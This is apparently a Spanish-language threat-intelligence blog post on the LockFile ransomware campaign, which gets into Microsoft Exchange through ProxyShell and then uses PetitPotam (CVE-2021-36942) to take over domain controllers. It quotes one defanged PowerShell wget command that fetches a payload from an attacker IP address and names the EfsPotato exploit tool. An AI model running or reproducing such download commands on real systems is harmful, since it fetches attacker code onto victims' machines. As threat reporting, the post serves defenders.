Skip to content

Microsoft Exchange PetitPotam

Investigadores han identificado un exploit para proxyshell, se descubrió que el proxyshell estaba siendo usado desde el 13 de agosto, y lo que concluye es que se trataría de una nueva variante de ransomware dirigida a varias industrias mundiales. Los atacantes obtienen acceso a las redes de las víctimas a través de servidores de Microsoft Exchange y luego usan la vulnerabilidad PetitPotam actualizada incompletamente para obtener acceso al controlador de dominio y luego se propagarse por la red.

Quedó catalogado con en el CVE-2021-36942. Los actores de la amenaza detrás de la familia de ransomware LockFile afectan directamente a los sectores de fabricación, financiero, de ingeniería, legal, de negocios, de viajes y de turismo en los Estados Unidos y Asia. Los actores de la amenaza están utilizando la vulnerabilidad PetitPotam, parcialmente parcheada, para obtener acceso al controlador de dominio después de obtener acceso a los servidores Microsoft Exchange en la red. La operación está utilizando una versión legítima de KuGou Active Desktop y la herramienta de código abierto Kernel Driver Utility junto con el ransomware.

El equipo ATR de McAfee recopila y analiza información de múltiples fuentes abiertas y cerradas antes de difundir los informes de inteligencia. Esta campaña fue investigada por Symantec y compartida públicamente. En la cadena de ataque los servidores de Exchange podrían estar ejecutando un comando de PowerShell wget hxxp://209.14.0[.] 234:46613/VcEtrKighyIFS5foGNXH. Por lo general, alrededor de 20 a 30 minutos antes de la implementación de ransomware, los atacantes instalan un conjunto de herramientas en el servidor de Exchange comprometido. En estas herramientas se incluye: Un exploit para la vulnerabilidad CVE-2021-36942 (también conocido como PetitPotam). El código parece copiarse de https://github.com/zcgonvh/EfsPotato. Esto está en un archivo llamado “efspotato.exe”. Dos archivos: active_desktop_render.dll y active_desktop_launcher.exe.

Conclusiones

  • PetitPotam, divulgado por el investigador de seguridad francés Lionel Gilles, es comparable al error PrintSpooler pero utiliza la API MS-EFSRPC para forzar la autenticación en lugar de MS-RPRN.
  • El protocolo remoto del sistema de archivos cifrados se utiliza para administrar de forma remota los objetos de datos en forma cifrada. EfsRpcOpenFileRaw, el método API utilizado en este ataque, es responsable de abrir y restaurar objetos cifrados creados por el sistema de archivos cifrados y es el origen del intento de autenticación.
  • La diferencia evidente entre ambos exploits es que PetitPotam no requiere ninguna autenticación cuando se dirige a los controladores de dominio.

Fuentes:

Valeria Becerra

Valeria Becerra